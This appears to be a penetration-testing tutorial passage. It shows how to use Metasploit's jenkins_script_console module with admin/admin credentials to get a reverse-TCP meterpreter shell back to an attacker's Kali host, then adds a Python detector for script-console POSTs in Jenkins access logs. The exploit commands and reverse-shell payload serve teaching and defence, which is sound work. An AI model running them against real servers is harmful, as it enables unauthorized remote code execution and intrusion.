Using Metasploit for automated exploitation

For this demonstration, we will use Metasploit to exploit the Jenkins server and get a meterpreter shell on it. Jenkins has its own script console, where a user can type in and run arbitrary code. This is dangerous if a user's credentials are stolen, as anyone holding them can then run arbitrary code on the Jenkins host through the script console. The Metasploit module we will be using takes advantage of this: it logs in with the supplied credentials and runs code through the script console that opens a connection back to the attacking machine.

Let's see how the exploitation is done:

  1. SSH into the Kali machine and load the Metasploit framework by issuing the following command:

         msfconsole

  2. Next, we will search Metasploit for any exploits related to Jenkins:

         search jenkins

     The output of the preceding command is as follows:

     We are presented with a number of modules that are related to Jenkins.

  3. We will use the jenkins_script_console exploit in this case. Issue the following command:

         use exploit/multi/http/jenkins_script_console

  4. Let's set up the exploit and configure our target server. Issue the following commands, one by one:

         set RHOSTS <<IP Address>>
         set RPORT 8080
         set USERNAME admin
         set PASSWORD admin
         set TARGETURI /
         set target 0

     Target 0 indicates that the target is a Windows machine.

  5. To see a list of all the payloads available, issue the following command:

         show payloads

     All available payloads are listed for our perusal:

  6. We'll use a reverse TCP payload for this exploit. Since our Windows machine is 64-bit, we'll choose the 64-bit payload to be delivered. Following that, set your LHOST to your Kali IP address:

         set payload windows/x64/meterpreter/reverse_tcp
         set LHOST <<Kali IP Address>>

     Once this is all done, you can issue the show options command to check that all required options have been filled in:

  7. Now, simply run the exploit. You will drop into a meterpreter shell:

We have successfully gained shell access to our target machine. In the next section, we will see how to perform privilege escalation and pivoting, as well as make our backdoor persistent.
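From the defender's side, the activity this module generates is an authenticated POST to the Jenkins script console, which is served at /script (the web form) and /scriptText (the API used by scripts). The following is an added example, not part of the book's walkthrough: a small Python detector that flags such requests in reverse-proxy access logs, matching on the last path segment so a Jenkins instance mounted under a non-root TARGETURI is still caught. The log lines, IP addresses and allow-list are constructed for illustration.

```python
import re
from dataclasses import dataclass

# Constructed sample lines in combined log format, as a reverse proxy in
# front of Jenkins would write them (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /job/build/1/console HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.7 - - [12/Mar/2024:10:02:10 +0000] "GET /login HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.7 - - [12/Mar/2024:10:02:15 +0000] "POST /script HTTP/1.1" 200 4411 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2024:10:03:00 +0000] "POST /jenkins/scriptText HTTP/1.1" 403 0 "-" "curl/7.88"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Last path segment of the two script console endpoints.
SCRIPT_CONSOLE_SEGMENTS = {"script", "scriptText"}


@dataclass
class Alert:
    ip: str
    ts: str
    path: str
    status: int
    ua: str
    succeeded: bool  # True when Jenkins accepted the request (status < 400)


def detect_script_console(log_text, allowed_ips=frozenset()):
    """Return one Alert per POST to the script console from a non-allow-listed IP."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        path = m["path"].split("?", 1)[0].rstrip("/")
        if m["method"] != "POST" or path.rsplit("/", 1)[-1] not in SCRIPT_CONSOLE_SEGMENTS:
            continue
        if m["ip"] in allowed_ips:
            continue  # e.g. a CI automation host that legitimately uses /scriptText
        status = int(m["status"])
        alerts.append(Alert(m["ip"], m["ts"], path, status, m["ua"], succeeded=status < 400))
    return alerts
```

A successful alert (status 200) from an unexpected source, following a fresh login, is the signature of the scenario above; a 403 from a script-console POST still merits review, because it shows someone probing for the console with credentials that lacked the permission.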
